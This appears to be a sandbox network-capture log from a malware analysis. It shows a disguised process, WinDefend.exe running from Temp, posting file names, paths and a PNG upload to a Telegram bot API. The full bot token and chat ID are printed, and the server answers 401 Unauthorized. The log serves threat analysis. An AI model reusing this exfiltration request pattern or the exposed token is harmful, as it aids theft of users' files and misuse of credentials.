2024-05-23 13:35:40 UTC	4096	OUT	Data Raw: 23 d6 55 dc 8f a0 ed 7e f4 2b 2f 9d 99 99 69 4c 34 dd da 3e e4 d7 18 0d bc 70 fe 7c fd 21 3d 12 36 06 fe ea 21 b1 69 1b ac ef 14 00 00 00 00 00 00 00 00 c0 8d f0 f0 70 87 c3 91 97 97 e7 fd 60 f2 c3 0f 3f d4 a3 d6 5b b7 6e 79 2a fa d5 67 7b 76 3a d9 f2 d1 a3 47 ad 03 8e b7 6d db e6 f4 66 bd a3 47 8f 5e b9 72 65 52 52 d2 93 27 4f f4 95 6c df be dd 34 db b3 89 fe e8 b4 69 d3 bc df c2 b2 5b e5 a5 65 17 7b f6 98 f1 8b e8 57 1f cf 6a ba 5d ae 1e 16 ea 43 5a 4d 37 8e ad ac ac b4 0e 75 d5 a7 4d 76 1f 55 76 f3 a1 ce 6e 98 3e 14 58 cf 89 ed df 88 d7 0d 53 70 6e 34 a3 29 54 76 f3 12 6e 52 79 37 0f b9 99 0a db cd bb b0 1e 24 8f 1f 3f d6 07 ce ea 0f f5 68 f4 7b ff fe 7d eb 3a 2f 5e bc e8 ea b6 be fa 76 5a 47 1e 47 4c 0d d7 73 62 00 00 00 f4 9c a6 a6 a6 a2 a2 a2 b4 76 Data Ascii: #U~+/iL4>p\|!=6!ip`?[ny*g{v:GmfG^reRR'Ol4i[e{Wj]CZM7uMvUvn>XSpn4)TvnRy7$?h{}:/^vZGGLsbv
2024-05-23 13:35:40 UTC	4096	OUT	Data Raw: 13 26 4c 70 f5 4e d5 38 4e d9 18 f5 eb f6 ed db 55 16 22 ff 1a 33 79 aa 3c 6f cf 9e 3d ea 57 95 d0 0c 1b 36 4c 9f 47 f4 c0 81 03 2a 7f ea ce c9 6b f3 89 4e 99 ee f5 7b ee dc 39 b5 c4 94 79 ab b1 d1 d2 1b 58 2f fb 0d d6 86 ed 4e f4 7b f5 ea 55 15 b4 e8 0b 55 56 2d ed ac 7e b5 d3 25 06 68 37 0e 7f e8 a9 ec 9c 56 1d 9e d7 5d 3e 02 8d 93 5d 0d c7 37 a8 c4 f1 e8 77 ff 13 da 4e c7 a2 b2 67 79 39 e3 7f ab 28 ab 57 af 76 13 fd 2a d6 7b fd aa e8 57 0d 5e 37 22 73 3b 27 ac 5c 83 c9 af 72 3d 76 ef de 3d a3 4e 7d 7d bd 0a aa 77 ee dc 69 ea 19 d4 cd e1 d4 ff a5 90 de de cd 0e b5 f9 37 c5 69 e7 19 16 16 a6 b2 6d fd 25 4a 4a 4a d4 95 a4 b4 a4 fc 7a e1 c2 05 35 90 fa e1 c3 87 46 9d ba ba 3a b5 e5 dd ec 9c 3b ec 6a b8 3c 03 00 c0 6f ed de bd 5b 2e 57 a2 a2 a2 9e fb 8e 7c Data Ascii: &LpN8NU"3y<o=W6LGkN{9yX/N{UUV-~%h7V]>]7wNgy9(Wv{W^7"s;'\r=v=N}}wi7im%JJJz5F:;j<o[.W\|
2024-05-23 13:35:40 UTC	4096	OUT	Data Raw: 2a 54 85 cd 9b 37 cb c2 f8 f8 78 e3 29 f5 f5 f5 db b6 6d 1b 3f 7e bc aa 3c 63 c6 8c 9c 9c 1c 35 89 a2 ba bf a6 ca 0c 3e f8 e0 03 d3 6b a9 db f8 e9 93 fe c9 aa 36 6d da 64 6c b3 fa ba 50 4f 80 a6 4d 9b e6 f4 0b 4a f7 db 0c b8 57 57 57 77 f8 f0 61 63 2c ac 61 ee dc b9 19 19 19 46 35 f5 35 fd 9e 3d 7b e4 28 55 df 5f ab 14 64 f1 e2 c5 a6 83 ad c3 23 b9 b5 7d a0 ed 8a 15 2b 8c d4 56 c5 0c f9 f9 f9 ea 51 15 24 0c 18 30 a0 c3 e8 57 ac 59 b3 46 1e 8a 8c 8c b4 f9 7e 33 33 33 d5 2b 1a 83 f9 5a bf 4b 29 64 9b 4d 37 77 54 09 cd e9 d3 a7 f5 85 ea 4e 93 52 b9 9b 27 af cd b6 b2 ba 78 f1 62 68 68 a8 8a 31 92 92 92 d4 42 e9 6a a6 4c 99 a2 72 0e 15 f9 48 cb a8 b1 6e 6e 58 1b 56 fa 13 3d fa d5 3b 3d eb 7e 31 91 e5 52 df 38 3c e4 d3 f8 fc f9 f3 1f 3f 7e ac 6e a2 2c ca cb cb Data Ascii: *T7x)m?~<c5>k6mdlPOMJWWWwac,aF55={(U_d#}+VQ$0WYF~333+ZK)dM7wTNR'xbhh1BjLrHnnXV=;=~1R8<?~n,
2024-05-23 13:35:40 UTC	4096	OUT	Data Raw: 9f bf d2 a2 df 3e ed 4c 63 79 8d 79 a7 f5 89 a9 5d 59 be 7c b9 f1 42 39 39 39 d6 0a b2 fd ea 25 5e bc 78 21 75 ee dc b9 a3 3f 3a 71 e2 c4 c9 93 27 eb 4b f4 f1 b8 fa 6c d8 ca f0 e1 c3 df 7d f7 5d 9b d1 ef a1 43 87 f4 76 8b 88 88 08 0d 0d 75 9a 95 da 6f e7 57 9d 89 7e a3 a3 a3 5f b9 88 7e 8f 1f 3f de 61 db 1a 31 fc 9e 3d 7b f4 c1 d9 b2 da 19 33 66 e8 35 e5 7d 49 cb 98 0e 1e 83 69 3f ca 9b 32 fe f3 81 b1 e4 d1 a3 47 af 3a 1f fd 66 66 66 f6 8e be 91 e8 17 5c 36 01 00 bd 1c 00 00 00 b8 ee e5 ba 17 00 bd 1c 02 8c af a2 df 75 eb d6 19 49 ea dd bb 77 3d b5 5a 59 95 17 a2 5f d9 78 cf b6 c6 a6 4d 9b 8c 4c 54 2d b9 71 e3 86 91 a5 1d 3a 74 48 af bc 76 ed 5a 3d 43 4d 4b 4b 53 cb 93 93 93 ad 91 a4 1e 07 e6 e7 e7 ab 85 fa a8 e2 15 2b 56 a8 85 7b f7 ee 4d 4a 4a aa a9 a9 Data Ascii: >Lcyy]Y\|B999%^x!u?:q'Kl}]CvuoW~_~?a1={3f5}Ii?2G:fff\6uIw=ZY_xMLT-q:tHvZ=CMKKS+V{MJJ
2024-05-23 13:35:40 UTC	4096	OUT	Data Raw: ed 99 9e 96 3e 66 d4 07 7a 0b d8 0f 0e e5 0a ea e4 89 13 6b 56 ad 9a 34 21 cc fe df e2 fb f7 ef c7 c7 ed fd 78 e2 24 69 7c fd 9e be bf fe f7 b7 64 8f 0c ec 3f 60 48 f0 df f6 d7 07 23 46 ca 9a 37 6f dc 24 17 ba 5d 7b ad d7 41 77 f6 20 d7 bd 7c ba 07 40 2f 87 80 e0 f3 e8 57 3c 7c f8 70 c6 8c 19 a6 a8 75 f1 e2 c5 c7 8e 1d bb 7b f7 6e 69 69 a9 a9 b2 2c 94 87 3c 1b fa 4e 99 32 c5 cd a3 73 e6 cc 91 4b 77 8e 16 f8 95 ea ea ea d8 d8 d8 fe fd fb eb 89 6f 9f 3e 7d 22 23 23 73 72 72 68 9f 6e 22 fa 05 97 4d f0 bc 8a 8a 8a d4 8b 97 b6 c7 c4 4e 99 fc b1 fd 68 ea 93 88 c8 c3 07 0f e5 de cc ad a9 ae f1 d4 96 a8 3b 7b 6d de b4 e9 e3 89 93 ec 6f c9 dc 99 b3 be 4a 4e f6 b7 c8 53 9a 45 1a 47 9a 48 1a ca b3 a1 a0 ab 32 69 42 d8 9a 55 ab 5e cf bb fa 79 a7 97 b3 46 bf 7f 7a a7 Data Ascii: >fzkV4!x$i\|d?`H#F7o$]{Aw \|@/W<\|pu{nii,<N2sKwo>}"##srrhn"MNh;{moJNSEGH2iBU^yFz
2024-05-23 13:35:40 UTC	4096	OUT	Data Raw: ae 0c c3 77 a9 a9 a8 d8 58 58 44 86 87 43 bf 92 ec 8d 87 9b 56 f9 79 79 ee eb 5d 85 6f e4 41 49 5c 9d 5d a4 0d de 38 f5 60 20 47 28 a7 85 89 29 49 bf 33 c9 ca 29 b2 f4 6b ac a7 1f 1b 15 9d 73 2a 3b f7 cc 99 c4 84 04 5b 0b 4b ae 9f 2e df e7 14 5b bc bc 8a 0a 0a d1 c7 e5 43 50 cd f3 51 91 3b 2d 4d cd 84 a4 f0 87 2f be a5 55 72 52 d2 b5 9a 9a 91 91 11 69 cb 9c 75 e2 e4 89 63 c7 e1 0f 56 66 e6 42 72 c4 4b 4f 53 2b 38 30 e8 4c ce e9 d6 96 16 c9 32 c9 c4 a4 5f 0c 40 0d 89 43 16 a1 db 83 cd 8d 8c 85 97 8d dd 4a 76 b0 b5 83 47 2b 2e 7a ef b8 26 d9 f7 f7 d1 a3 47 c7 32 33 a1 2d 34 57 a8 63 0a d0 34 7e 5b 7d b2 b3 4e f5 f4 f4 08 ef 1b af 5f bf 16 f7 89 f3 cf e5 d9 db d8 62 3a 78 ba 27 18 db 8a f2 cb 6c 5d a1 48 0c 89 5f be 54 0e cd 07 d6 15 72 84 c7 14 fe 8c d8 7f Data Ascii: wXXDCVyy]oAI\]8` G()I3)ks*;[K.[CPQ;-M/UrRiucVfBrKOS+80L2_@CJvG+.z&G23-4Wc4~[}N_b:x'l]H_Tr
2024-05-23 13:35:40 UTC	4096	OUT	Data Raw: dc 2c 84 a4 5f 82 20 08 2e 24 fd 12 b4 6c 22 a6 87 f7 e7 5f 96 97 ef 8a 89 b1 30 31 15 2e dc ea 6b 69 87 6e 0f 3e 97 9b db d6 da 0a 9d 2d 2e 36 96 0d 1f 27 f9 9a ff cd 1c f5 25 4b 37 7b 78 5c 28 2d 9d 0c cf 9b c9 80 6f cb 8c 7b 7d f0 e4 73 13 e2 c9 47 28 8e 95 53 64 e9 17 83 12 bb 3a bb 5c be 54 2e 64 0b b8 a3 bd 3d 31 21 c1 c9 de fe d3 78 94 36 85 c7 8f 1f 9f 3c 7e c2 67 8b b7 96 fa ca 89 79 df a2 14 0a 83 a5 e4 df ff 16 3e c6 47 46 46 60 88 41 e1 4d 0d 8d 84 9c 9c 2d 5c fa e5 7a cd e2 b6 b8 9d 95 f5 a1 83 e9 42 7c aa b8 e5 4c da b3 07 6c 26 6b 0a 24 cb 18 dc a0 cd e8 95 b5 d9 d3 13 52 e3 0b b0 c9 d7 22 9a 2b d4 b7 78 79 1d cb fc 9f af d2 2f bf fc 32 34 34 54 5a 52 b2 7e ed 3a 4c 1f 5b 61 93 9b 7b e5 e5 0a 21 ed ce 82 7e 5d d0 61 a0 db b0 67 2b 72 db 62 Data Ascii: ,_ .$l"_01.kin>-.6'%K7{x\(-o{}sG(Sd:\T.d=1!x6<~gy>GFF`AM-\zB\|Ll&k$R"+xy/244TZR~:L[a{!~]ag+rb
2024-05-23 13:35:41 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:41 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
202	192.168.2.5	61253	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:41 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 251 Expect: 100-continue
2024-05-23 13:35:41 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:41 UTC	251	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 61 69 63 5f 66 69 6c 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 62 6f 77 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 66 69 6c 65 5f 74 79 70 65 73 25 35 43 68 69 5f 63 6f 6e 74 72 61 73 74 25 35 43 61 69 63 5f 66 69 6c 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 62 6f 77 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 35 30 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+aic_file_icons_hiContrast_bow.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cfile_types%5Chi_contrast%5Caic_file_icons_hiContrast_bow.png%0ASize%3A+50+KB
2024-05-23 13:35:42 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:42 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
203	192.168.2.5	61254	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:41 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:35:41 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:41 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 39 36 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+96.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:35:42 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:42 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
204	192.168.2.5	61255	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:42 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 258 Expect: 100-continue
2024-05-23 13:35:42 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:42 UTC	258	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 39 30 36 36 37 34 35 66 66 34 34 62 36 38 39 62 35 63 63 38 39 63 33 64 37 33 39 37 30 66 30 31 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 39 30 36 36 37 34 35 66 66 34 34 62 36 38 39 62 35 63 63 38 39 63 33 64 37 33 39 37 30 66 30 31 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 32 37 Data Ascii: chat_id=1655240967&text=File%3A+9066745ff44b689b5cc89c3d73970f01.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C9066745ff44b689b5cc89c3d73970f01.png%0ASize%3A+127
2024-05-23 13:35:42 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:42 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
205	192.168.2.5	61256	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:42 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="7c02f42e-db9e-45df-912d-bade5ff55dc0" Host: api.telegram.org Content-Length: 52064 Expect: 100-continue
2024-05-23 13:35:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:43 UTC	40	OUT	Data Raw: 2d 2d 37 63 30 32 66 34 32 65 2d 64 62 39 65 2d 34 35 64 66 2d 39 31 32 64 2d 62 61 64 65 35 66 66 35 35 64 63 30 0d 0a Data Ascii: --7c02f42e-db9e-45df-912d-bade5ff55dc0
2024-05-23 13:35:43 UTC	145	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 61 69 63 5f 66 69 6c 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 62 6f 77 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 61 69 63 5f 66 69 6c 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 62 6f 77 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=aic_file_icons_hiContrast_bow.png; filename*=utf-8''aic_file_icons_hiContrast_bow.png
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0e bc 00 00 00 80 08 06 00 00 00 e3 87 28 7b 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 40 00 49 44 41 54 78 01 ec 7d 09 dc 76 d5 b8 7e f3 57 48 45 34 a1 cf 50 49 94 21 8e 13 ea 55 0a c9 10 7f c3 c9 94 9c 64 88 38 9c 10 47 8f 0c 71 e4 14 3a 21 c3 67 9e 9d 3a 24 44 f5 a2 c4 21 85 54 84 92 f8 cc 45 49 a5 f2 bf ae ef dd d7 f7 ae 77 7d 7b 58 6b 3f 7b 58 7b 3f f7 fd fb dd ef bd 86 7b ad 75 df d7 5a f7 f3 ec 67 ed bd f6 bb d6 5a e5 74 1b 54 1f 04 fe 02 f8 62 f0 35 e0 7f 24 ce d7 c1 be 1f 83 4f 06 1f 0a de 12 6c 34 3d 02 9b a0 8b 13 c0 bf 01 87 ae 81 95 d0 7d 29 b8 0f 5a 86 41 5f 00 fe 19 38 d4 de 58 bd 9f a2 ef e7 81 37 02 1b 75 87 c0 10 3f 97 62 d7 56 88 fe 8d 80 fc 52 f0 69 e0 23 c0 77 07 a7 46 75 3e 37 Data Ascii: PNGIHDR({sRGB@IDATx}v~WHE4PI!Ud8Gq:!g:$D!TEIw}{Xk?{X{?{uZgZtTb5$Ol4=})ZA_8X7u?bVRi#wFu>7
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: 9f b6 eb 79 1f 91 34 f2 b6 5f 37 fd 3c a4 be 5f 47 0f 75 9d 2e 6f 2f cd 12 76 e0 55 88 ac b5 96 ed cf 2f 62 61 a9 62 04 52 8f 77 db 9f 2f 9e 3b b7 66 16 e2 dd ae e7 dd 19 af 97 3e 1a cd 74 fd 2a d9 f5 43 b3 1c 37 84 78 b8 75 02 9e cf 98 69 96 85 50 e8 18 ec 4b 38 84 f4 9b 8a 8e ed d7 a5 32 13 69 db 31 94 78 d7 7f 86 3a 09 70 5e 51 03 52 8b f7 1a a0 25 d6 c4 be df a7 9f 90 21 c4 fb 3c dc cc 8b d7 75 50 be 2b f8 4f e0 4b c0 65 94 d7 be 48 df be df 8b 90 e9 b7 dc e2 7d 7a fc 53 8e f7 83 e1 1e 63 ef 50 f0 46 60 1e 7e e5 b3 b4 3e b1 ee c9 60 ea ce e2 81 57 e2 61 d7 f3 44 c1 a8 0a 81 94 e3 9d b6 eb c0 eb 7a 99 23 7c e1 34 e3 da 7d 89 cd ed 90 df 1d cc ef fa 22 62 9b 50 a2 6e 8c 7e 68 bf 6d ea 95 c6 fb 4f 32 87 e4 d8 ac ca 0b 80 c3 66 6d ce c2 c0 fb ee 73 d1 c7 Data Ascii: y4_7<_Gu.o/vU/babRw/;f>t*C7xuiPK82i1x:p^QR%!<uP+OKeH}zScPF`~>`WaDz#\|4}"bPn~hmO2fms
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: fd 85 4a b6 71 ff 73 75 51 ff 55 e5 1a af 4a 6f 28 f5 f2 47 72 28 76 0f c5 ce bc 87 e4 bb be 9e bf 0c 60 69 7e 43 25 db f8 c4 b6 a1 a4 71 ca f4 a9 53 f4 80 fa 21 a8 63 fd 04 9c 47 21 fd e7 b5 8b 2d eb 6a 9c 58 bb ea ea cb 1f c9 ba fd 58 bb 7c 04 fa 8a 77 de b4 f2 63 89 87 e0 ee 94 6f e6 aa 52 b6 e1 3a 98 07 f3 30 cc c6 60 97 58 17 4a 75 d7 93 da dd 2f 74 a0 9a 7a 2b d1 8e 63 55 dd b4 93 3d 35 87 49 ae 99 fc 91 4c ce c0 81 1b d4 57 bc bb b0 3d 1a 19 ae eb 53 c0 ff ea 56 44 a6 b9 46 42 a9 cd f5 f4 d2 cc 88 87 40 72 9c 6d 42 8d aa a1 d7 a6 1f 35 cc 99 ba 89 fc 91 9c ba 43 eb 60 09 02 7d c5 fb 35 b0 82 0f 9a ba c4 39 76 a9 ec c0 2b 5f 66 c1 7b 90 2e f9 ed dd 3a 3f 1d b2 9e a4 d3 a7 f4 af 81 ea f8 e1 b7 49 39 ef 63 9d b2 ad 43 b4 ed 68 18 ed 63 7c 2d ca e6 1a Data Ascii: JqsuQUJo(Gr(v`i~C%qS!cG!-jXX\|wcoR:0`XJu/tz+cU=5ILW=SVDFB@rmB5C`}59v+_f{.:?I9cChc\|-
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: 63 de a8 2e 22 ae 91 50 6a 7b 3d 7d 17 86 fc 29 d4 98 29 f4 da f6 63 0a d3 6a 35 95 3f 92 b5 3a b1 46 d1 08 74 19 ef d1 c6 15 34 e0 1a 09 a5 90 f5 24 9d 3e 65 d5 b5 85 6c 0b f5 3b 75 3d f9 23 99 ba bd 63 b1 cf f6 eb d6 9c 49 ae c1 8b 9d 62 7f 4d e6 e5 dd ef f8 2b d1 96 3a a2 33 90 f8 aa 32 90 ac e3 cb 2c 63 c8 1f 33 a6 6d 8a ba f2 47 32 45 1b c7 68 93 c5 7b fe ac da fe 7c 3e 2e 4d 95 2a ce 25 9b ea d7 fa 29 47 a0 eb 78 e7 4b 5b e7 32 de 05 72 39 58 87 c2 b8 9f b5 05 b8 8a b8 46 42 a9 8b f5 a4 31 f2 64 a8 9d 55 7a ea bb 4a 6f 28 f5 f2 47 72 28 76 0f dd ce ae e3 dd c5 8b ff 15 69 db ac 60 39 a4 e2 3e 2b 2a 14 5c 23 a1 d4 c4 7a ba 25 06 e3 33 87 ec 8b f7 d8 97 81 49 87 83 d5 ff ff ad 2a 59 f3 8f ff a0 7d a8 8f 7e 4f 1a c7 2f 1f 6a 5e fe 48 0e d5 8f a1 d9 dd Data Ascii: c."Pj{=}))cj5?:Ft4$>el;u=#cIbM+:32,c3mG2Eh{\|>.M%)GxK[2r9XFB1dUzJo(Gr(vi`9>+\#z%3I*Y}~O/j^H
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: ef cf 72 b0 fa 67 a4 27 e0 fd c1 bc 0f c8 f4 ab c0 b7 05 97 11 d7 48 28 d5 5d 4f fe 75 38 fb 61 dc ff 18 7c 32 78 02 de 11 5c 44 4f 45 05 3f 17 34 be e4 45 28 db 05 49 2e a6 00 00 40 00 49 44 41 54 aa a8 51 49 f9 aa f6 bc e0 61 c2 25 96 19 8d 17 81 b1 cf b7 fc 9b b5 75 3c 36 bf e5 8f 22 71 d6 e6 53 7e 87 c8 ad a1 c4 0b c8 7b 84 28 37 a0 73 0e fa 08 bd b8 e4 3c b6 3d 77 31 63 68 5d b5 6d 53 03 30 97 76 31 16 3f e4 a4 fc 51 7e e8 f3 23 3f 24 1f 86 c4 4b c1 fc cf 53 94 3f 01 a7 4a cf 82 61 ef 77 8c fb 16 d2 bc b8 0e a1 98 58 0c e9 2f 4f 27 66 0c ad ab d8 f5 74 7f 0c fc 75 30 1f 70 7d 0e f8 3d 60 d1 db 90 78 11 98 0f 46 ff 1b f8 53 e0 3f 82 d7 07 3f 01 cc 1b 28 a1 17 e5 a1 76 d5 f5 03 a6 24 49 f2 47 c6 85 e2 20 fd 3e 24 df 9e f6 40 30 1f 4e bd 2f 98 3f 2c b9 Data Ascii: rg'H(]Ou8a\|2x\DOE?4E(I.@IDATQIa%u<6"qS~{(7s<=w1ch]mS0v1?Q~#?$KS?JawX/O'ftu0p}=`xFS??(v$IG >$@0N/?,
2024-05-23 13:35:43 UTC	4096	OUT	Data Raw: 63 3a 31 dd e1 21 a0 79 96 1c 9e 07 e5 16 8f d5 af 72 af 17 bf 78 aa f4 86 52 af 79 94 1c 8a dd 63 b5 53 f3 20 39 54 3f 87 6e bf 70 1f 8b 1f be 3f 63 f0 6b 47 38 f5 47 b0 7c c9 93 f2 3b 55 e9 db 9c aa 9d 55 76 c9 8f 2a bd d0 7a fd 80 af 7a 50 6e 27 74 a8 b1 8b e4 b9 a1 83 3a 7d 45 34 49 5a d5 c7 a4 6f 63 1f 02 03 dc 1f 54 be 7d 6d e5 f9 39 f1 c8 be 9d c7 f8 be 7f 09 98 54 cb 04 f9 51 ab 31 1a 71 93 ed 3a b0 fa 99 46 3e a1 ae 11 ce f8 53 74 91 54 53 1f c7 3a c6 71 b3 d3 ef 27 f4 20 d8 c4 6b 1b fa 60 b9 0e 4f f9 e3 d6 b1 3f a5 36 63 f1 47 7e a4 84 6d 1d 5b c6 e2 87 7c 97 3f 92 2a 6f 4b f2 5a 4a 63 51 da 81 d7 a5 48 bb d8 30 3d 54 92 1f 65 f6 eb 33 fb d7 65 4a 0d d4 71 13 5e f6 b8 92 d7 91 7c a0 aa 8c a4 5f a6 33 a4 3a f9 23 39 14 db 79 70 69 3d cf d8 b3 90 Data Ascii: c:1!yrxRycS 9T?np?ckG8G\|;UUvzzPn't:}E4IZocT}m9TQ1q:F>StTS:q' k`O?6cG~m[\|?oKZJcQH0=Te3eJq^\|_3:#9ypi=
